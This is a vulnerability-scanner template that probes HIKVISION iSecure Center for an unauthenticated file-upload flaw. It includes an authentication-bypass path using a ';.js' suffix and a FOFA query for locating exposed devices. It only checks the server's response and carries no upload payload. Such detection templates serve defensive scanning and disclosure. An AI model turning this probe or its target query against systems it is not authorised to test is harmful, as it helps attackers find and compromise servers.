id: hikvision_isecure_center_unauth_upload_files

info:
  name: hikvision_isecure_center_unauth_upload_files
  author: rootklt
  severity: critical
  description: |
    HIKVISION iSecure Center综合安防管理平台 /center/api/files 接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。
  reference:
    - https://github.com/ibaiw/2023Hvv/blob/main/%E6%B5%B7%E5%BA%B7%E5%8D%AB%E8%A7%86%E5%89%8D%E5%8F%B0%E4%B8%8A%E4%BC%A0.md
  metadata:
    fofa-query: 'product=="HIKVISION-iSecure-Center"&&icon_hash=="-808437027"'
    hunter-query: 
    verified: true
  tags: 2023,hikvision,upload,rce

variables:
  filename: "{{rand_text_alpha(10)}}"
  url: '{{replace("{{RootURL}}", "http://", "https://")}}'

requests:
  - method: POST
    path:
      - "{{url}}/center/api/files;.js"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary039Jk2fE73KKrZ3A
      Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "请上传文件"
        condition: and
      - type: status
        status:
          - 200